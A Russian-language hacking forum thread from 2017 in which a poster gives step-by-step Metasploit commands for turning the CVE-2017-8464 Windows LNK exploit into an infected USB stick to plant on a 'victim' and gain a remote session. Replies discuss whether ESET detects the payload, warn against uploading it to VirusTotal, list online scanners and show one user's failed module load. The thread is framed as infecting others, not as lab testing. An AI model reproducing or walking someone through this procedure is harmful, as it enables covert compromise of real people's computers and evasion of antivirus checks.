ANTICHAT
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   /bad USB CVE_2017_8464\ _ # by Ondrik8 (https://forum.antichat.xyz/showthread.php?t=560514)

Ondrik8 15.09.2017 12:48
Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !

https://forum.antichat.xyz/attachmen...673f410a91.png



уязвимые ОС-и

https://forum.antichat.xyz/attachmen...71b9d4fd69.png



переименовываем и телепортируем в метасплойт:

Код:


Код:
mv 42382 CVE_2017_8464_LNK_Rce.rb
Код:


Код:
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
запускаем MSF и обновляемся командой: reload_all и...

https://forum.antichat.xyz/attachmen...b3608c9422.png

exploit -j

далее, настраиваем под себя уязвимость:

Код:


Код:
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
https://forum.antichat.xyz/attachmen...a245958fde.png



можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!

Ondrik8 15.09.2017 22:42
Цитата:

MrsRobot сказал(а):

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?
не нетестил с антиками) если есть возможность? отпиши плиз..

Ondrik8 15.09.2017 23:10
Цитата:

MrsRobot сказал(а):

где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)

Ondrik8 15.09.2017 23:34
Цитата:

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
www.antivirusware.com/
http://www.threatexpert.com
https://www.zonealarm.com
http://www.virscan.org
https://www.symantec.com
https://www.comodo.com

persivald 16.09.2017 00:01
Цитата:

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
есет смарт секьюрити (лицензия) обнаруживает трояна

Ondrik8 16.09.2017 20:04
Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")

ghost 16.09.2017 22:02
Цитата:

Ondrik8 сказал(а):

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
Хороший фильм

Код:


Код:
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >

ghost 17.09.2017 14:22
Заработало!

adm2 17.09.2017 16:34
Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?

persivald 17.09.2017 19:43
Цитата:

adm2 сказал(а):

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?
а не надо ничего в голове держать) для этого есть сканеры)


Время: 20:24
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице